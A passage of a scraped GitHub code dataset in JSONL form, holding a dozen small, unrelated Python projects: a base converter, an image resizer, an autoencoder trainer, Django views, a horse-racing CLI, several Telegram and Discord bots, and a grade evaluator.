int(input('Sua opção: '))\r\n\r\nif cond == 1:\r\n print('{} convertido para BINÁRIO é igual a {}'.format(num, bin(num)[2:]))\r\nelif cond == 2:\r\n print('{} convertido para OCTAL é igual a {}'.format(num, oct(num)[2:]))\r\nelif cond == 3:\r\n print('{} convertido para HEXADECIMAL é igual a {}'.format(num, hex(num)[2:]))\r\nelse:\r\n print('Opção inválida, tente novamente.')\r\n\r\n#ao fim da conversao fatiamos a exibição para exibir a partir da 2º casa, para retirar as citações de bin, oct, e hx do python (0b = bin / 0o = oct / 0x = hex)\r\n","repo_name":"rtreale/Desafios-Curso_em_Video","sub_path":"MUNDO 02/desafio037.py","file_name":"desafio037.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8766423809","text":"import os\nimport re\nimport tkinter as tk\nfrom tkinter import filedialog, messagebox, ttk\nfrom PIL import Image, ImageTk\nfrom PIL.Image import Resampling\n\nfrom custom_dialog import CustomDialog\nfrom super_resolution import SuperResolution\n\nFILETYPES = (\n (\"JPEG files\", \"*.jpg\"),\n (\"PNG files\", \"*.png\"),\n (\"All files\", \"*.*\")\n)\n\nPLACEHOLDER_PATH = \"assets/placeholder.jpg\"\nHEIGHT_OFFSET = 70\nMODELS_DIR = \"models\"\n\nclass ImageResizer(tk.Tk):\n def __init__(self, canvas_width, canvas_height):\n super().__init__()\n self.title('Image Resizer')\n self.resizable(0, 0)\n self.canvas_width = canvas_width\n self.canvas_height = canvas_height\n self.center_window()\n self.setup_ui()\n\n def center_window(self):\n \"\"\" Center the window on the screen \"\"\"\n screen_width = self.winfo_screenwidth()\n screen_height = self.winfo_screenheight()\n x = int((screen_width - self.canvas_width) / 2)\n y = int((screen_height - self.canvas_height) / 2)\n self.geometry(f\"{self.canvas_width}x{self.canvas_height+HEIGHT_OFFSET}+{x}+{y}\")\n\n def setup_ui(self):\n self.setup_picture_frame()\n self.setup_controls_frame()\n\n def setup_picture_frame(self):\n # Picture frame\n self.picture_frame = ttk.Frame(self)\n self.picture_frame.grid(row=0, column=0)\n\n # Canvas\n self.canvas = tk.Canvas(\n self.picture_frame,\n width=self.canvas_width,\n height=self.canvas_height)\n self.canvas.grid(row=0, column=0)\n\n # Resolution label\n self.resolution_label = ttk.Label(\n self.picture_frame,\n text=\"Original resolution: -x-\\nResized resolution: -x-\")\n self.resolution_label.grid(row=1, column=0)\n self.set_picture(PLACEHOLDER_PATH)\n\n def setup_controls_frame(self):\n # Controls frame\n self.controls_frame = ttk.Frame(self)\n self.controls_frame.grid(row=1, column=0)\n\n # Buttons\n ttk.Button(self.controls_frame, text='Open', command=self.open_picture).grid(row=0, column=0)\n ttk.Button(self.controls_frame, text='Save', command=self.save_picture).grid(row=0, column=1)\n ttk.Button(self.controls_frame, text='Resize', command=self.resize_picture).grid(row=0, column=2)\n ttk.Button(self.controls_frame, text='Clear', command=self.clear_picture).grid(row=0, column=3)\n\n def open_picture(self):\n \"\"\" Open the picture \"\"\"\n filename = filedialog.askopenfilename(\n initialdir='images/',\n title='Select an image',\n filetypes=FILETYPES)\n\n if filename:\n self.set_picture(filename, True)\n\n def save_picture(self):\n \"\"\" Save the picture \"\"\"\n if self.original_image is None:\n messagebox.showinfo(\"Information\", \"Please open the image to resize first\")\n return\n\n if self.resized_image is None:\n messagebox.showinfo(\"Information\", \"Please resize the image first\")\n return\n\n filename = filedialog.asksaveasfilename(\n initialdir='images/', \n title='Save as...', \n filetypes=FILETYPES)\n\n if filename:\n # Save the resized_image in the given path.\n self.resized_image.save(filename)\n\n def resize_picture(self): \n \"\"\" Resize the picture \"\"\"\n if self.original_image is None:\n return\n\n # Get the size of the image object\n width, height = self.original_image.size\n\n # Show the input dialog to get new resolution and model path\n input_result = self.show_input_dialog()\n\n if input_result is not None:\n w, h, model_path = input_result\n\n print(model_path)\n\n if model_path:\n sr = SuperResolution(self.file_path)\n scale_factor = int(re.findall(r'\\d+', model_path)[0])\n\n self.resized_image = sr.upscale_image(scale_factor, model_path)\n else:\n self.resized_image = self.update_resolution(w, h)\n\n try:\n if self.resized_image is not None:\n new_width, new_height = self.resized_image.size\n self.set_picture('', pil_img=self.resized_image)\n self.resolution_label.config(text=f\"Original resolution: {width}x{height}\\nResized resolution: {new_width}x{new_height}\")\n except Exception as e:\n print(f\"Error: {e}\")\n\n def clear_picture(self):\n \"\"\" Clear the picture \"\"\"\n # Set the default placeholder image\n self.set_picture(PLACEHOLDER_PATH)\n # Update the resolution label\n self.resolution_label.config(text=\"Original resolution: -x-\\nResized resolution: -x-\")\n # Clear the image references\n self.original_image = None\n self.resized_image = None\n self.file_path = None\n\n def set_picture(self, file_path, cache_img=False, pil_img=None):\n \"\"\" Set the picture to the canvas \"\"\"\n if pil_img is None:\n pil_img = Image.open(file_path)\n\n if cache_img:\n # Save the image object for future reference\n self.original_image = pil_img\n self.file_path = file_path\n\n width, height = self.original_image.size\n self.resolution_label.config(text=f\"Original resolution: {width}x{height}\\nResized resolution: -x-\")\n\n # Resize the picture for canvas\n resized_img = pil_img.resize(\n (self.canvas_width, self.canvas_height),\n Resampling.LANCZOS)\n\n self.tk_image = ImageTk.PhotoImage(resized_img)\n\n # Set background image\n self.bg = self.canvas.create_image(\n 0,\n 0,\n anchor=tk.NW,\n image=self.tk_image)\n \n def update_resolution(self, new_width, new_height):\n \"\"\" Update the resolution \"\"\"\n return self.original_image.resize((new_width, new_height), Image.NEAREST)\n\n def show_input_dialog(self):\n # Define the input fields and options\n model_options = [f for f in os.listdir(MODELS_DIR) if f.endswith(\".pb\")]\n options = {\"Model Path\": model_options}\n\n # Create a CustomDialog instance\n dialog = CustomDialog(self, \"Enter new resolution and model path:\",\n fields=[(\"New Width\", 640), (\"New Height\", 480), (\"Model Path\", \"\", \"select\")],\n options=options)\n\n # Show the dialog and wait for user input\n result = dialog.show()\n\n # Return the result\n if result:\n return int(result[\"New Width\"]), int(result[\"New Height\"]), result[\"Model Path\"]\n else:\n return None\n\nif __name__ == '__main__':\n app = ImageResizer(640, 480)\n app.mainloop()","repo_name":"Hollister009/image_processing","sub_path":"lab1/image_resizer/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6814,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"14266187825","text":"import matplotlib.pyplot as plt\nimport time\nimport datetime\nimport csv\n\nx=[]\ny=[]\n\nwith open('feeds.csv' , 'r') as csvfile:\n with open('newv.csv', 'w') as newfile:\n writer = csv.writer(newfile)\n plots = csv.reader(csvfile, delimiter=',')\n i=1\n for row in plots:\n if i==1:\n i=0\n continue\n tmp = row[0]\n # convert timestamp of format 2022-09-01T23:34:59+05:30 to datetime object\n # tmp = datetime.strptime(tmp, '%Y-%m-%dT%H:%M:%S%z')\n tmp = time.mktime(time.strptime(tmp, '%Y-%m-%dT%H:%M:%S%z'))\n row[0] = tmp\n i+=2\n # write this row to new csv\n print(row[0])\n if((row[0] > 1662645120.0) & (i%5==0)):\n writer.writerow(row)\n\n\n","repo_name":"Namrath02/Air-Pollution-Monitor","sub_path":"plots/nplot.py","file_name":"nplot.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15628888098","text":"import time\r\nimport torch\r\nfrom torch import nn\r\nimport torch.optim as optim\r\nimport numpy as np\r\nimport os\r\n\r\nimport variables as var\r\n\r\nclass Autoencoder(nn.Module):\r\n def __init__(self,enc_hidden,dec_hidden):\r\n \r\n super(Autoencoder,self).__init__()\r\n \r\n # encoder\r\n self.enc_list = []\r\n for i in range(1,len(enc_hidden)):\r\n self.enc_list.append(nn.Linear(enc_hidden[i-1],enc_hidden[i]))\r\n self.enc_list.append(nn.ReLU(True))\r\n self.enc_list.pop()\r\n self.enc_list = nn.ModuleList(self.enc_list)\r\n\r\n #decoder\r\n self.dec_list = []\r\n for i in range(1,len(dec_hidden)):\r\n self.dec_list.append(nn.Linear(dec_hidden[i-1],dec_hidden[i]))\r\n self.dec_list.append(nn.ReLU(True))\r\n self.dec_list.pop()\r\n self.dec_list = nn.ModuleList(self.dec_list)\r\n\r\n def forward(self,x):\r\n \r\n for f in self.enc_list:\r\n x = f(x)\r\n \r\n encoding = x\r\n\r\n for f in self.dec_list:\r\n x = f(x)\r\n \r\n reconstruction = x\r\n \r\n return encoding, reconstruction\r\n\r\n\r\nclass Decoder(nn.Module):\r\n def __init__(self,dec_hidden):\r\n \r\n super(Decoder,self).__init__()\r\n \r\n #decoder\r\n self.dec_list = []\r\n for i in range(1,len(dec_hidden)):\r\n self.dec_list.append(nn.Linear(dec_hidden[i-1],dec_hidden[i]))\r\n self.dec_list.append(nn.ReLU(True))\r\n self.dec_list.pop()\r\n self.dec_list = nn.ModuleList(self.dec_list)\r\n \r\n def forward(self,x):\r\n \r\n for f in self.dec_list:\r\n x = f(x)\r\n \r\n reconstruction = x\r\n \r\n return reconstruction\r\n\r\ndef train_model(dataset,net,train_loader,val_loader,save_model=True):\r\n\r\n optimizer = optim.Adam(net.parameters(), lr = var.lr, betas=(0.5, 0.999))\r\n loss_fn = nn.SmoothL1Loss(reduction = \"none\")\r\n\r\n train_losses = []\r\n val_losses = []\r\n\r\n start = time.time()\r\n for epoch in range(1,var.n_epochs+1):\r\n #training\r\n net.train()\r\n train_batch_loss = [] \r\n for x_batch in train_loader:\r\n x_batch = x_batch.to(var.device)\r\n # Makes predictions\r\n _, x_rec = net(x_batch)\r\n # Computes loss\r\n loss = loss_fn(x_batch,x_rec).mean()\r\n # Computes gradients\r\n loss.backward()\r\n # Updates parameters\r\n optimizer.step()\r\n #zero gradient \r\n optimizer.zero_grad()\r\n # Returns the loss\r\n train_losses.append(loss.item())\r\n train_batch_loss.append(loss.item())\r\n \r\n #validation\r\n with torch.no_grad():\r\n val_batch_loss = []\r\n net.eval()\r\n for x_batch in val_loader: \r\n x_batch = x_batch.to(var.device) \r\n _, x_rec = net(x_batch.to(var.device))\r\n val_loss = loss_fn(x_batch, x_rec).mean()\r\n val_losses.append(val_loss.item())\r\n val_batch_loss.append(val_loss.item())\r\n\r\n #print progress\r\n print(\"Epoch: %d, Loss %.8f, Validation Loss %.8f\" % (epoch, np.mean(train_batch_loss), np.mean(val_batch_loss)))\r\n \r\n #early stopping\r\n if val_loss < 0.003:\r\n break\r\n\r\n end = time.time()\r\n print(\"Training time: %.8f minutes\" %((end-start)/60))\r\n\r\n model_save_file = \"saved_models/%s/\" %dataset\r\n if not os.path.exists(os.path.dirname(model_save_file)):\r\n os.makedirs(os.path.dirname(model_save_file))\r\n\r\n torch.save(\r\n {'model_state_dict': net.state_dict(),\r\n 'optimizer_state_dict': optimizer.state_dict(),\r\n 'epoch': epoch,\r\n 'loss' : loss,\r\n 'val_loss': val_loss\r\n }, \"%snet.pth\" %model_save_file)\r\n\r\n return net\r\n ","repo_name":"agoodge/APAE","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3910,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"26815621627","text":"import io\nimport os\nimport click\nimport pandas as pd\nfrom datetime import datetime\nfrom commands import schedule as commands_schedule\nfrom commands import race as commands_race\nfrom datasource.netkeiba import io as netkeiba\n\n\npd.set_option(\"display.max_columns\", None)\n\ndef main():\n cmd()\n\n@click.group()\ndef cmd():\n \"\"\"First layer sub-command group\n \"\"\"\n pass\n\n@cmd.group()\ndef schedule():\n \"\"\"Second layer sub-command group\n \"\"\"\n pass\n\n@cmd.group()\ndef race():\n \"\"\"Second layer sub-command group\n \"\"\"\n pass\n\n@schedule.command()\n@click.option(\n \"--year\", \"-y\", type=int, default=datetime.now().year,\n help=\"Target year to get the schedule\"\n)\n@click.option(\n \"--place\", \"-p\", is_flag=True,\n help=\"\"\"\n Getting place data or not.\n If you cannot set this flag, you get only place.\n \"\"\"\n)\ndef get(year, place):\n \"\"\"Getting the schedule of JRA horse racing\n \"\"\"\n name_list = commands_schedule.get(year, place)\n print(name_list)\n return name_list\n\n@race.command()\n@click.option(\n \"--name\", \"-n\", type=str,\n help=\"Race name to get the race result\"\n)\n@click.option(\n \"--track\", \"-t\", multiple=True,\n type=click.Choice(list(netkeiba.track_list._asdict().keys())),\n help=\"\"\"\n [multiple] Track name to get the race result\n \"\"\"\n)\n@click.option(\n \"--place\", \"-p\", multiple=True,\n type=click.Choice(list(netkeiba.place_list._asdict().keys())),\n help=\"\"\"\n [multiple] Place name to get the race result\n \"\"\"\n)\n@click.option(\n \"--course-situation\", \"-cs\", multiple=True,\n type=click.Choice(list(netkeiba.course_situation_list._asdict().keys())),\n help=\"\"\"\n [multiple] Course situation to get the race result\n \"\"\"\n)\n@click.option(\n \"--race-conditions\", \"-rs\", multiple=True,\n type=click.Choice(list(netkeiba.race_conditions_list._asdict().keys())),\n help=\"\"\"\n [multiple] Race conditions to get the race result\n \"\"\"\n)\n@click.option(\n \"--horse-age\", \"-ha\", multiple=True,\n type=click.Choice(list(netkeiba.horse_age_list._asdict().keys())),\n help=\"\"\"\n [multiple] Horse age to get the race result\n \"\"\"\n)\n@click.option(\n \"--grade\", \"-g\", multiple=True,\n type=click.Choice(list(netkeiba.grade_list._asdict().keys())),\n help=\"\"\"\n [multiple] Grade to get the race result\n \"\"\"\n)\n@click.option(\n \"--distance-from\", \"-df\", type=int,\n help=\"Minimum distance to get the race result\"\n)\n@click.option(\n \"--distance-to\", \"-dt\", type=int,\n help=\"Maximum distance to get the race result\"\n)\n@click.option(\n \"--start-year\", \"-sy\", type=int, default=datetime.now().year,\n help=\"Year to start to get the race result\"\n)\n@click.option(\n \"--start-month\", \"-sm\", type=int,\n help=\"Month to start to get the race result\"\n)\n@click.option(\n \"--end-year\", \"-ey\", type=int,\n help=\"Year to end to get the race result\"\n)\n@click.option(\n \"--end-month\", \"-em\", type=int,\n help=\"Month to end to get the race result\"\n)\ndef get_result(\n name, track, place, course_situation, race_conditions, horse_age,\n grade, distance_from, distance_to,\n start_year, start_month, end_year, end_month\n):\n \"\"\"Getting the race result of JRA horse racing\n \"\"\"\n params = {\n netkeiba.url_params.PID: netkeiba.pid_list.RACE_LIST,\n netkeiba.url_params.WORD: name,\n netkeiba.url_params.TRACK: [\n eval(\"netkeiba.track_list.\" + val) for val in track\n ],\n netkeiba.url_params.PLACE: [\n eval(\"netkeiba.place_list.\" + val) for val in place\n ],\n netkeiba.url_params.COURSE_SITUATION: [\n eval(\"netkeiba.course_situation_list.\" + val)\n for val in course_situation\n ],\n netkeiba.url_params.RACE_CONDITIONS: [\n eval(\"netkeiba.race_conditions_list.\" + val)\n for val in race_conditions\n ],\n netkeiba.url_params.HORSE_AGE: [\n eval(\"netkeiba.horse_age_list.\" + val) for val in horse_age\n ],\n netkeiba.url_params.GRADE: [\n eval(\"netkeiba.grade_list.\" + val) for val in grade\n ],\n netkeiba.url_params.DISTANCE_FROM: distance_from,\n netkeiba.url_params.DISTANCE_TO: distance_to,\n netkeiba.url_params.START_YEAR: start_year,\n netkeiba.url_params.START_MONTH: start_month,\n netkeiba.url_params.END_YEAR: end_year,\n netkeiba.url_params.END_MONTH: end_month\n }\n results = commands_race.get_result(params)\n print(results)\n return results\n\n@race.command()\n@click.option(\n \"--name\", \"-n\", type=str,\n help=\"Target name to get the race details\"\n)\n@click.option(\n \"--year\", \"-y\", type=int, default=datetime.now().year,\n help=\"Target year to get the race details\"\n)\n@click.option(\n \"--month\", \"-m\", type=int, default=datetime.now().month,\n help=\"Target month to get the race details\"\n)\ndef get_details(name, year, month):\n \"\"\"Getting the race details of JRA horse racing\n \"\"\"\n params = {\n netkeiba.url_params.PID: netkeiba.pid_list.RACE_LIST,\n netkeiba.url_params.WORD: name,\n netkeiba.url_params.START_YEAR: year,\n netkeiba.url_params.END_YEAR: year,\n netkeiba.url_params.START_MONTH: month,\n netkeiba.url_params.END_MONTH: month\n }\n details = commands_race.get_details(params)\n print(details)\n return details\n\nif __name__ == \"__main__\":\n main()","repo_name":"YusukeKambara/japan_horse_racing","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12425929231","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import include,handler404,handler500,re_path\nfrom django.contrib import admin\nfrom . import views\n\napp_name = 'mormo'\n\nurlpatterns = [\n # /\n re_path(r'^$',views.index,name='index'),\n # /contact/\n re_path(r'^contact/$',views.contact,name='contact'),\n # /admin/\n re_path(r'^admin/', admin.site.urls),\n # /logs/\n re_path(r'^logs/',include('cmdMonitor.urls',namespace='cmdMonitor')),\n # /accounts/\n re_path(r'^accounts/', include('django.contrib.auth.urls')),\n]\n\nhandler404=views.error_404\nhandler500=views.error_500\n","repo_name":"narendra-cs/mormo","sub_path":"mormo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"70475752191","text":"from searchParties import partyLookup\nfrom searchMeta import metaLookup\n\ndef getLoyalty(party_code, congress):\n party_loyalty = partyLookup({\"id\": int(party_code)}, \"Web_Members\")\n\n try:\n party_cong_loyalty = party_loyalty[str(congress)]\n except:\n party_cong_loyalty = {\"nvotes_yea_nay\": 1, \"nvotes_abs\": 0, \"nvotes_against_party\": 0, \"nvotes_party_split\": 0}\n\n global_loyalty = metaLookup(\"Web_Members\")\n try:\n global_cong_loyalty = global_loyalty[\"loyalty_counts\"][str(congress)]\n except:\n global_cong_loyalty = {\"nvotes_yea_nay\": 1, \"nvotes_abs\": 0, \"nvotes_against_party\": 0, \"nvotes_party_split\": 0}\n\n return {\"global\": global_cong_loyalty, \"party\": party_cong_loyalty}\n\n","repo_name":"voteview/WebVoteView","sub_path":"model/loyalty.py","file_name":"loyalty.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"60"} +{"seq_id":"11219553170","text":"from aiogram import types\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters import CommandStart\nfrom aiogram.utils.deep_linking import decode_payload\n\nfrom loader import dp\nfrom states.get_name import GetName\nfrom utils.db_api.db_commands import get_all_groups, create_student, update_student_name, get_all_groups_pk, \\\n get_group_by_pk\n\n\n@dp.message_handler(CommandStart())\nasync def start_cmd(message: types.Message):\n deep_link = message.get_args()\n groups = await get_all_groups_pk()\n if deep_link == '':\n await message.answer('☹️ Бот доступен только студентам СКТ')\n else:\n payload = decode_payload(deep_link)\n if int(payload) in groups:\n group = await get_group_by_pk(int(payload))\n await create_student(\n telegram_id=message.from_user.id,\n username=message.from_user.username,\n group=group.group_name\n )\n await message.answer('✅Отлично!\\n\\n'\n '✍️ Теперь отправь мне свое Имя и Фамилию, как записано в журнале\\n\\n'\n '(БЕЗ номера в журнале!)')\n\n await GetName.name.set()\n\n else:\n await message.answer('⛔️ Некорректная кодировка группы.')\n\n\n@dp.message_handler(state=GetName.name)\nasync def get_student_name(message: types.Message, state: FSMContext):\n name = message.text\n await update_student_name(\n telegram_id=message.from_user.id,\n name=name\n )\n\n await state.reset_state(True)\n\n await message.answer(f'👋 Приятно познакомиться, {name.split(\" \")[0]}!\\n'\n f'🤖 Я - Бот СКТ, который поможет всем преподавателям и студентам в прохождении тестов!\\n\\n'\n f'🤔 Что делать дальше?\\n'\n f'👉 Осталось дело за малым - ждать теста. Как только преподаватель отправит новый тест, '\n f'я сразу сообщу тебе об этом!')\n","repo_name":"bichief/testing-bot","sub_path":"handlers/users/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"36747819860","text":"# egg code\nimport disnake\n\nfrom disnake.ext import commands\n\nbot = commands.Bot(command_prefix='!', intents=disnake.Intents.all())\n\n@bot.event\n\nasync def on_message(message):\n\n if \"egg\" in message.content:\n\n await message.add_reaction('🥚')\n\n await bot.process_commands(message)\n\n@bot.event\n\nasync def on_ready():\n\n await bot.change_presence(activity=disnake.Activity(name='🥚', type=disnake.ActivityType.playing))\n\n print('Bot is ready')\n\nbot.run('token')\n","repo_name":"ManulCode/egg","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"971984552","text":"from asyncio import sleep\nfrom datetime import timedelta\nfrom time import time\nimport os\n\nfrom motor.motor_asyncio import AsyncIOMotorClient\nfrom pyrogram import Client, filters\nfrom pyrogram.types import Message\nfrom pyrogram.errors import FloodWait\n\napi_id = int(os.environ.get(\"API_ID\"))\napi_hash = os.environ.get(\"API_HASH\")\nsession = os.environ.get(\"String_Session\")\nchat = int(os.environ.get(\"Channel_ID\"))\noffline_mark = os.environ.get(\"Offline_Mark\")\nsend_time = int(os.environ.get(\"Send_Time\"))\nusername_time = int(os.environ.get(\"UserName_Time\"))\ntime_out = int(os.environ.get(\"Time_Out\"))\nsleep_time = int(os.environ.get(\"Sleep_Time\"))\ndb_link = os.environ.get(\"DataBase_Link\")\ndb_name = os.environ.get(\"DataBase_Name\")\n\nclient = Client(session, api_id, api_hash)\n\nmongoClient = AsyncIOMotorClient(db_link)\ndb = mongoClient[db_name][\"Bots\"]\ndb_last = mongoClient[db_name][\"Last\"]\n\nAllBots = {}\nStatus = {\"UserName\": 0, \"ID\": 0, \"Flood\": 0, \"Last\": 1}\nbot = {\"username\": None, \"status\": False}\n\n\nasync def main():\n await get_all_bots()\n while True:\n async for msg in client.iter_history(chat, reverse=True, offset_id=Status[\"Last\"]):\n if msg.text:\n try:\n await check_msg(msg)\n except Exception as e:\n print(f\"Error: {e}\")\n await sleep(sleep_time)\n\n\nasync def check_msg(msg: Message):\n text = \"\"\n edit = False\n for line in msg.text.markdown.split('\\n'):\n for word in line.split():\n if word.startswith('@') and word.lower().endswith('bot'):\n off = line.find(offline_mark)\n await sleep(send_time)\n try:\n work, by_username = await check_bot(word)\n except FloodWait as e:\n wait = e.x + 10 * 60\n Status[\"Flood\"] = int(time()) + wait\n await sleep(wait)\n work, by_username = await check_bot(word)\n except Exception as e:\n print(f\"Error: {e}\")\n continue\n if work:\n if off > -1:\n text += f\"\\n{line[:off - 1]}\"\n edit = True\n else:\n text += f\"\\n{line}\"\n else:\n if off > -1:\n text += f\"\\n{line}\"\n else:\n text += f\"\\n{line} {offline_mark}\"\n edit = True\n if by_username:\n Status[\"UserName\"] += 1\n await sleep(username_time)\n else:\n Status[\"ID\"] += 1\n break\n else:\n text += f\"\\n{line}\"\n if edit:\n await msg.edit_text(text, reply_markup=msg.reply_markup)\n await db_last.update_one({}, {\"$set\": {\"last\": msg.message_id}}, upsert=True)\n\n\nasync def check_bot(username):\n bot[\"username\"] = username[1:]\n bot[\"status\"] = False\n if username[1:] in AllBots:\n b = AllBots[username[1:]]\n await client.send_message(b[\"id\"], \"/start\")\n by_username = False\n else:\n msg = await client.send_message(username[1:], \"/start\")\n data = {\"id\": msg.chat.id, \"username\": username[1:]}\n await db.insert_one(data)\n AllBots[username[1:]] = data\n by_username = True\n await sleep(time_out)\n return bot[\"status\"], by_username\n\n\n@client.on_message(filters.bot)\nasync def response(_, msg):\n if msg.chat.username == bot[\"username\"]:\n bot[\"status\"] = True\n\n\n@client.on_message(filters.command(\"all\", prefixes=\".\") & filters.outgoing)\nasync def all_bots(_, msg: Message):\n file = \"All-Bots.txt\"\n with open(file, \"w\") as f:\n for i in AllBots.values():\n f.write(f\"@{i['username']}\\n{i['id']}\\n\\n\")\n await msg.reply_document(file)\n\n\n@client.on_message(filters.command(\"status\", prefixes=\".\") & filters.outgoing)\nasync def bot_status(_, msg: Message):\n if time() > Status[\"Flood\"]:\n flood = \"None\"\n else:\n flood = str(timedelta(seconds=int(Status[\"Flood\"] - time())))\n text = (f\"Last-Message-ID: {Status['Last']}\\n\\n\"\n f\"By-UserName: {Status['UserName']}\\n\\n\"\n f\"By-ID: {Status['ID']}\\n\\n\"\n f\"Flood: {flood}\")\n await msg.edit_text(text)\n\n\nasync def get_all_bots():\n async for b in db.find({}):\n AllBots[b[\"username\"]] = b\n last = await db_last.find_one({})\n if last is None:\n Status[\"Last\"] = 1\n await db_last.insert_one({\"last\": 1})\n else:\n Status[\"Last\"] = last[\"last\"]\n\n\nclient.start()\nclient.loop.run_until_complete(main())\n","repo_name":"Sallat-M/BotsChecker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"16359938563","text":"from .carro import shopping_cart\nfrom Apps.Store.models import productos_model\nfrom django.shortcuts import redirect\n\ndef agregar_producto(request, producto_id):\n carro = shopping_cart(request)\n product_to_add= productos_model.objects.get(id=producto_id)\n carro.agregar(producto=product_to_add)\n return redirect(\"store\")\n\ndef eliminar_producto(request, producto_id):\n carro = shopping_cart(request)\n product_to_add= productos_model.objects.get(id=producto_id)\n carro.eliminar(producto=product_to_add)\n return redirect(\"store\")\n\ndef restar_producto(request, producto_id):\n carro = shopping_cart(request)\n product_to_add = productos_model.objects.get(id=producto_id)\n carro.restar_producto(producto=product_to_add)\n return redirect(\"store\")\n\ndef limpiar_carro(request):\n carro = shopping_cart(request)\n carro.limpiar_carro()\n return redirect(\"store\")\n\n\n\n\n\n\n\n","repo_name":"pablonalonso/E-Commerce-Django","sub_path":"Apps/ShoppingCart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"40191689595","text":"estudiantes = [\n {\n 'nombre': 'juan',\n 'apellido': 'perez',\n 'notas': {\n 'MAT': 30,\n 'QMC': 30,\n 'FIS': 30,\n 'LAB': 30\n },\n 'extras': [2, 3, 1, 1, 1],\n 'asistencia': 90\n },\n {\n 'nombre': 'ana',\n 'apellido': 'rivera',\n 'notas': {\n 'MAT': 98,\n 'QMC': 98,\n 'FIS': 98,\n 'LAB': 98\n },\n 'extras': [1],\n 'asistencia': 100\n }\n]\n\n\nclass Evaluador:\n \"\"\"Esta clase implementa diversas funciones para calcular promedios\n de una lista de estudiantes y obtener otros datos adicionales, ademas,\n tambien implementa una funcion para escribir un reporte de notas\"\"\"\n\n def __init__(self, lista_estudiantes, min_asistencia, max_extras):\n self.lista_estudiantes = lista_estudiantes\n self.min_asistencia = min_asistencia\n self.max_extras = max_extras\n\n def calcular_promedios(self):\n promedios = []\n for estudiante in self.lista_estudiantes:\n nombre_completo = estudiante['nombre'].capitalize() + ' ' + estudiante['apellido'].capitalize()\n notas = estudiante.get('notas', {})\n asistencia = estudiante['asistencia']\n extras = sum(estudiante.get('extras', []))\n\n if not notas or asistencia < self.min_asistencia:\n promedio_final = 0\n else:\n promedio_notas = sum(notas.values()) / len(notas)\n promedio_final = min(promedio_notas + extras, 100)\n\n promedios.append({'nombre completo': nombre_completo, 'promedio': promedio_final})\n\n return promedios\n\n def obtener_mejor_estudiante(self):\n promedios = self.calcular_promedios()\n mejor_estudiante = max(promedios, key=lambda estudiante: estudiante['promedio'])\n return mejor_estudiante\n\n def salvar_datos(self, nombre_archivo):\n import csv\n\n promedios = self.calcular_promedios()\n\n with open(nombre_archivo, 'w', newline='') as archivo_csv:\n campos = ['Nombre Completo', 'Asistencia', 'MAT', 'FIS', 'QMC', 'LAB', 'Total Extras', 'Promedio Final',\n 'Observación']\n escritor_csv = csv.DictWriter(archivo_csv, fieldnames=campos)\n\n escritor_csv.writeheader()\n\n for estudiante in self.lista_estudiantes:\n nombre_completo = estudiante['nombre'].capitalize() + ' ' + estudiante['apellido'].capitalize()\n notas = estudiante.get('notas', {})\n asistencia = estudiante['asistencia']\n extras = sum(estudiante.get('extras', []))\n if not notas or asistencia < self.min_asistencia:\n promedio_final = 0\n observacion = 'REPROBADO'\n else:\n promedio_notas = sum(notas.values()) / len(notas)\n promedio_final = min(promedio_notas + extras, 100)\n observacion = 'APROBADO' if promedio_final > 50 else 'REPROBADO'\n\n fila = {\n 'Nombre Completo': nombre_completo,\n 'Asistencia': asistencia,\n 'MAT': notas.get('MAT', 0),\n 'FIS': notas.get('FIS', 0),\n 'QMC': notas.get('QMC', 0),\n 'LAB': notas.get('LAB', 0),\n 'Total Extras': extras,\n 'Promedio Final': promedio_final,\n 'Observación': observacion\n }\n escritor_csv.writerow(fila)\n\n\n# -----------------------------------------#\n# ----> NO MODIFICAR DESDE AQUI! <---------#\n# -----------------------------------------#\ndef comparar_archivo_notas(archivo):\n with open('ejemplo_notas.csv', 'r') as archivo_correcto:\n correcto_str = archivo_correcto.read()\n\n with open(archivo, 'r') as archivo:\n archivo_str = archivo.read()\n\n return correcto_str == archivo_str\n\n\nif __name__ == '__main__':\n # datos iniciales\n nombre_archivo = 'notas.csv'\n notas_correcto = [{'nombre completo': 'Juan Perez', 'promedio': 35.0}, {'nombre completo': 'Ana Rivera', 'promedio': 99.0}]\n mejor_correcto = {'nombre completo': 'Ana Rivera', 'promedio': 99.0}\n\n # Instanciar evaluador\n evaluador = Evaluador(lista_estudiantes=estudiantes, min_asistencia=80, max_extras=5)\n # calcular promedios\n notas = evaluador.calcular_promedios()\n print(f'calcular_promedios: {notas}')\n if notas == notas_correcto:\n print('Calculo de promedios correcto!')\n else:\n print(f'ERROR, lista de promedios esperada: {notas_correcto}')\n # obtener mejor estudiante\n mejor = evaluador.obtener_mejor_estudiante()\n 